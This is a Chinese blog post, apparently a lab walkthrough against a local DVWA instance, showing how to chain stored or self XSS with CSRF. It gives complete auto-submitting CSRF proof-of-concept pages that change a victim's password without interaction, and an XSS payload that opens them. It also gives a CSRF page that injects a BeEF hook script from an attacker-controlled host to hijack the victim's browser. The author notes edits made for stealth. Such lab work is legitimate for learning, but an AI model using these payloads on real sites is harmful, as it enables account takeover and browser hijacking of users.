复现CSRF + SelfXSS

已于 2022-08-14 23:15:20 修改
阅读量172 收藏 1
点赞数
分类专栏: 网络 前端 文章标签: csrf 前端 xss
于 2022-08-14 22:36:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59280309/article/details/126336113
版权

目录

存储型 XSS + CSRF

使用 CSRFTester 工具生成构造 POC

 设置代理:

构造xss代码:

CSRF + SelfXSS

 构造 XSS 代码

构造 CSRF 代码

xss:跨站脚本攻击、诱骗用户点击恶意链接盗取用户cookie进行攻击、不需要用户进行登录、xss除了利用cookie还可以篡改网页等
csrf:跨站请求伪造、无法获取用户的cookie而是直接冒充用户、需要用户登录后进行操作

存储型 XSS + CSRF

使用 CSRFTester 工具生成构造 POC

CSRFTester 工具生成的 POC,比使用 BurpSuite 生成的 POC 更加隐蔽,受害者打开该 POC 后,浏览器会自动执行代码随后跳转到正常页面,中途不需要用户交互,也不用像 BurpSuite 生成的 POC 那样还需要受害者手动点击按钮。

 设置代理:

 打开 DVWA 的 CSRF 模块,输入密码后,先别急着点击 Change.

 这时先开启 CSRFTester 的流量记录功能。

开启后,再点击 Change,之后 CSRFTester 就会抓取到修改密码的数据包,这个时候,一般 CSRFTester 还会记录其他流量,所以直接右击将不相关的流量进行删除即可,只保留我们需要的流量。

之后,在 Form Parameters 中将左侧 Query Parameters 数据修改复制即可,值得注意的是 Display in Browers 选项是默认勾选的,这里建议根据自己情况而定。因为这个工具自动生成的代码在我这边是需要手动修改才能利用的,所以我这边选择取消勾选。

之后点击 Generate HTML,选择保存的位置后,手动进行修改即可,当然如果工具生成的代码可以正常使用,就不需要修改了。

对于代码的修改,我主要是将 head、H2标题的内容删除了,以增加隐蔽性。同时增加了倒数第 4 行的代码,因为没有这一句,这个 POC 是不能正常使用的,最后修改后的 CSRF POC 代码如下。

<html>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "42" );
function pausecomp(millis){
    var date = new Date();
    var curDate = null;
    do { curDate = new Date(); }
    while(curDate-date < millis);}
function fireForms(){
    var count = 1;
    var i=0;
    for(i=0; i<count; i++){
        document.forms[i].submit();
        pausecomp(pauses[i]);}}
</script>
<form method="GET" name="form0" action="http://192.168.3.4/dvwa/vulnerabilities/csrf/?password_new=12345678&password_conf=12345678&Change=Change">
<input type="hidden" name="password_new" value="111111"/>
<input type="hidden" name="password_conf" value="111111"/>
<input type="hidden" name="Change" value="Change" />
</form>
</body>
</html>

构造xss代码:

<script src="x" onerror=javascript:window.open("http://192.168.3.4/csrf.html")></script>

在 XSS (Stored) 模块下,插入 XSS 代码,当然了前提 Security Level 要设置为 low。

在 DVWA 中会碰到 POC 太长而无法输入完全的情况,这个时候在开发者工具中将这个框的 maxlength 值设置大一点即可,这里我设置了 500.

 点击 sign guestbook 按钮,POC 就会被插进去了,之后用其他浏览器登陆其他用户,访问存储型 XSS 模块页面,当然前提也需要把 Security Level 要设置为 low.

上图中的“/csrf.html”文件为CSRFTester保存的代码

这里我测试了两次,所以有两个一样的,不过无伤大雅

访问页面后,浏览器会自动跳转,同时返回修改密码的界面,如果弹出页面显示如下图中的 Password Changed 字样,就说明受害者的密码修改成功了,而这也仅仅是因为受害者点击了一个页面。  

CSRF + SelfXSS

 构造 XSS 代码

 这里使用 beef 作为 XSS 平台。

<script src="http://192.168.44.22:3000/hook.js"></script>

192.168.44.22为部署beef的Kali 

构造 CSRF 代码

这里继续使用 CSRFTester 工具生成 CSRF POC。

具体步骤如上图,这里就直接放出 CSRF POC 代码了,主要还是修改了倒数第 4 行的代码  

<html>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "54" );
function pausecomp(millis){
    var date = new Date();
    var curDate = null;
    do { curDate = new Date(); }
    while(curDate-date < millis);}
function fireForms(){
    var count = 1;
    var i=0;
    for(i=0; i<count; i++){
    	document.forms[i].submit(); 
        pausecomp(pauses[i]);}}   
</script>
<form method="GET" name="form0" action="http://192.168.3.4:80/dvwa/vulnerabilities/xss_r/?name=<script src='http://192.168.44.22:3000/hook.js'></script>">
<input type="hidden" name="name" value="<script src='http://192.168.44.22:3000/hook.js'></script>"/> 
</form>
</body>
</html>

将上面代码放到本地 Web 服务中,打开其他浏览器,登陆其他账户,再打开我们构造的 CSRF 链接

http://192.168.3.4/test2.html

打开链接后,beef 中就能看到上线的主机了。

戲子 鬧京城°ぃ
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XSS平台源码(xsser.me)
12-27
XSS平台源码(xsser.me)
CSRF漏洞复现
m0_57485346的博客
03-15 1929
CSRFXSS的区别:CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的权限,而XSS是直接盗取到了用户的权限,然后实施破坏。发现地址直接改成了taiyuan,而我们没有对页面进行任何操作,只是把url改了一下。hack要在不知道Kevin的账号密码情况下,修改Kevin的地址信息。1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号。2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力。然后我们把这条请求当中的地址(add)改成taiyuan。去短连接生成网站转成短连接。
挖洞经验 | self-xss的进化之路
weixin_40418457的博客
05-04 2311
本文涉及漏洞点: 1、self-xss 2、scheme 跳转 3、URL 跳转 4、CSRF 5、JSONP 挖掘过程分解: 一、挖掘背景介绍 在某次冲浪过程中,随手测试了一下这个系统的预览功能,点击预览会生成二维码,需要手机QQ扫描才能访问预览界面。 随手点击F12修改HTML源码,插入XSS代码 再次扫描二维码预览,触发XSS。 原本以为这就结束了,直到换了一个账户,扫描之后才发现进坑了,这是一个self-xss,无奈洞是自己挖的,无论如何也要利用起来。 二、self-xss的上位之路 1.首
CSRF漏洞复现(含XSSCSRF梦幻联动)
weixin_73180072的博客
09-22 157
pikaqiu靶场。
CSRF+Self XSS
newlife1441的博客
08-16 554
CSRF,跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去运行。。防御原理:由于服务端没有对客户端进行身份校验,所以我们可以通过添加令牌token、验证码等方法来防御csrfCSRF 利用的是网站对用户浏览器的信任。Self XSS,自己输入xss脚本,输出仅自己看到,仅xss。............
7、csrf漏洞复现
sigali的博客
03-17 1241
7、csrf漏洞复现 csrf全名为跨站请求伪造,是一种对网站的恶意利用,虽然听起来和xss很像,但是它们俩还是有很大的区别的。xss窃取了用户的cookie身份认证信息,而csrf没有窃取登录凭证,仅仅是“冒用”。 例如: 一个有csrf漏洞的A网站,网站B是攻击者构造的一个恶意网站,当用户没有退出A网站,或者用户登陆A网站的cookie没有过期,只要在同一个浏览器中打开这个网站B,攻击者就可以利用用户的身份进行用户才能进行的操作了。 这里我们用DVWA的靶场: LOW等级 抓包后,去掉Referer字段
CSRF(跨站请求伪造)和SSRF(服务端请求伪造)漏洞复现:风险与防护方法
weixin_43263566的博客
08-30 595
CSRF漏洞指的是攻击者利用受害者的身份,在其不知情的情况下发送恶意请求给目标网站。由于目标网站无法区分恶意请求和正常请求,因此会执行该请求。这使得攻击者能够以受害者的名义执行一些不被授权的操作,例如更改密码、发表言论、转账等。不过我这里是测试就直接在浏览器打开脚本复现成功,其他类型的攻击方式操作也是这样。SSRF漏洞指的是攻击者通过操纵目标Web应用程序中的请求来发起伪造请求。攻击者利用这种漏洞可以访问应用程序所在服务器上的本地资源,或者攻击内部网络中的其他系统,并执行恶意操作。
xss+csrf+html练习源码.rar_XSS_csrf_csrf源码_xss源码_xss练习源码
09-20
xss反射存储型的+csrf+html注入老网站的练习源码
命令执行+CSRF
06-11
本节课程分两个方面,命令执行包含os命令执行、struts2远程命令执行、变量覆盖。CSRF漏洞包含GET型及POST型两种类型的CSRF漏洞,每种漏洞不仅包含原理分析还包含攻击过程演示。
XSS平台带短信,邮件提醒
07-15
1、新增了邮件提醒功能 (若想生效自行修改文件\source\function.php 257行 把里面的邮箱账号密码换一下) 2、新增飞信短信提醒功能 (同上 修改\source\api.php 72行 应该只支持移动手机号吧?) 3、新增短网址功能 4、增加个人设置功能 (其实就是为了方便修改手机号和邮箱而已~还可以关闭邮件和短信提醒哦~) 升级方式: 1、直接使用本包提供的所有文件(别忘了修改config.php .htaccess) 2、在原有的xsser.me源码基础上升级: 首先直接覆盖所有文件! 然后在数据库中,oc_user表中添加两个字段,根据xssplatform.sql添加.
XSS20关练习源码
09-04
包含20关XSS练习的源码。文件都为PHP类型,下载个phpstudy就可以搭建起来了。我已经通过了,所以共享出来给大家练习。
基础漏洞csrf挖掘实战
10-07
当我们可以使目标对象浏览器发送HTTP请求到别的Web 网站时,就会发生跨站请求伪造(CSRF)攻击。该Web网站会执行一些操作,使得请求看起来是有效的,...简而言之csrf攻击就是利用了网站用于请求进行身份认证的进程的缺陷。
CSRF漏洞详细说明
02-26
Cross-SiteRequestForgery(CSRF),中文一般译作跨站请求伪造。经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。...
跨站攻击(XSS+CSRF).docx
01-05
跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。...
前端安全防护实战:XSSCSRF防御与同源策略详解(react 案例)
qq_35374791的博客
05-03 734
前端安全防护实战中,主要涉及三个方面:XSS (Cross-Site Scripting) 攻击的防御、CSRF (Cross-Site Request Forgery) 攻击的防御,以及浏览器的同源策略
element-ui的bug记录
nick_zhang的博客
04-29 495
7.el-dialog组件在关闭时,会触发子组件的created/mounted生命周期。原因是当visible改变为false,即关闭dialog的时候,如果用户设置了destroyOnClose=true,则执行key++;key是绑定在较外层的div上的,key值的变化会导致这个div重新渲染。6.select 的 popper-append-to-body ,默认值为true;dialog的append-to-body,默认值为false;3.element表格前端分页。
【Web】CTFSHOW 中期测评刷题记录(1)
uuzeray的博客
05-02 1385
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag。
50个前端实战项目之04:隐藏的搜索小组件
最新发布
前端开发博客
05-03 893
大家好,我是宝哥。今天讲50个前端实战项目之04:隐藏的搜索小组件。源码下载地址https://github.com/bradtraversy/50projects50days/tree/master/hidden-search前端实战项目系列正在更新:04/5001:可展开卡片02:进度条03:旋转导航动画04:隐藏的搜索小组件项目介绍本项目演示了一个简洁实用的隐藏式搜索小部件。点击搜索按钮后,...
dvwa+csrf高级
10-14
DVWA(Damn Vulnerable Web Application)是一个用于练习Web应用程序渗透测试的漏洞演示平台,而CSRF(Cross-Site Request Forgery)则是一种常见的Web应用程序安全漏洞。在DVWA中,可以通过模拟CSRF攻击来学习和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

戲子 鬧京城°ぃ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值